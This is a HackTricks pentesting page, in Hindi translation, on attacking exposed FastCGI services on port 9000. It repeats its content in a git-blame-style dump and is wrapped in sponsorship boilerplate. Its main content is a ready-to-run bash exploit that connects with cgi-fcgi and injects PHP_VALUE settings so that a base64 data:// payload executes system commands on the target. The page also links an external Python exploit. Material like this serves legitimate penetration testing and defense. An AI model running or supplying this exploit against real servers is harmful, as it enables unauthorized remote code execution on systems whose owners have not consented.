hacktricks/network-services-pentesting/9000-pentesting-fastcgi.md

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>

- क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!

- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह

- प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)

- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**

</details>


# मूलभूत जानकारी

यदि आप जानना चाहते हैं कि **FastCGI क्या है**, तो निम्नलिखित पृष्ठ की जांच करें:

{% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %}
[disable\_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/disable\_functions-bypass-php-fpm-fastcgi.md)
{% endcontent-ref %}

डिफ़ॉल्ट रूप से **FastCGI** पोर्ट **9000** में चलता है और nmap द्वारा मान्यता प्राप्त नहीं होता है। **आमतौर पर** FastCGI केवल **localhost** में सुनता है।

# RCE

FastCGI को अनिवार्य कोड निष्पादित करना बहुत आसान है:
```bash
#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done
```
या आप निम्नलिखित पायथन स्क्रिप्ट का उपयोग भी कर सकते हैं: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)


<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!

- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)

- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated to Hindi 2023-11-06 08:38:02 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			- क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की आवश्यकता है? [सदस्यता योजनाएं](https://github.com/sponsors/carlospolop) की जांच करें!
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`- खोजें [The PEASS Family](https://opensea.io/collection/the-peass-family), हमारा विशेष [NFT](https://opensea.io/collection/the-peass-family) संग्रह`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`- प्राप्त करें [आधिकारिक PEASS और HackTricks swag](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			- शामिल हों [💬](https://emojipedia.org/speech-balloon/) [डिस्कॉर्ड समूह](https://discord.gg/hRep4RUj7f) या [टेलीग्राम समूह](https://t.me/peass) या मुझे ट्विटर पर फ़ॉलो करें [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`- अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`


Translated to Hindi 2023-11-06 08:38:02 +00:00			`# मूलभूत जानकारी`
GitBook: [master] 2 pages modified 2021-01-06 17:11:57 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`यदि आप जानना चाहते हैं कि FastCGI क्या है, तो निम्नलिखित पृष्ठ की जांच करें:`
GitBook: [master] 2 pages modified 2021-01-06 17:11:57 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %}`
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`[disable\_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/disable\_functions-bypass-php-fpm-fastcgi.md)`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% endcontent-ref %}`
GitBook: [master] 2 pages modified 2021-01-06 17:11:57 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`डिफ़ॉल्ट रूप से FastCGI पोर्ट 9000 में चलता है और nmap द्वारा मान्यता प्राप्त नहीं होता है। आमतौर पर FastCGI केवल localhost में सुनता है।`
GitBook: [master] 2 pages modified 2021-01-06 17:11:57 +00:00
fix mess 2 2022-05-01 12:49:36 +00:00			`# RCE`
GitBook: [master] 2 pages modified 2021-01-06 17:11:57 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`FastCGI को अनिवार्य कोड निष्पादित करना बहुत आसान है:`
GitBook: [master] 2 pages modified 2021-01-06 17:11:57 +00:00			```bash
			`#!/bin/bash`

			`PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"`
			`FILENAMES="/var/www/public/index.php" # Exisiting file path`

			`HOST=$1`
			`B64=$(echo "$PAYLOAD"\|base64)`

			`for FN in $FILENAMES; do`
Translated to Hindi 2023-11-06 08:38:02 +00:00			`OUTPUT=$(mktemp)`
			`env -i \`
			`PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \`
			`SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \`
			`cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT`
GitBook: [master] 2 pages modified 2021-01-06 17:11:57 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`cat $OUTPUT`
GitBook: [master] 2 pages modified 2021-01-06 17:11:57 +00:00			`done`
			```
Translated to Hindi 2023-11-06 08:38:02 +00:00			`या आप निम्नलिखित पायथन स्क्रिप्ट का उपयोग भी कर सकते हैं: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			- क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की आवश्यकता है? [सदस्यता योजनाएं](https://github.com/sponsors/carlospolop) की जांच करें!
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`- खोजें [The PEASS Family](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [NFTs](https://opensea.io/collection/the-peass-family)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`- प्राप्त करें [आधिकारिक PEASS & HackTricks swag](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			- शामिल हों [💬](https://emojipedia.org/speech-balloon/) [Discord समूह](https://discord.gg/hRep4RUj7f) या [टेलीग्राम समूह](https://t.me/peass) में या मुझे ट्विटर पर फ़ॉलो करें [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`- अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`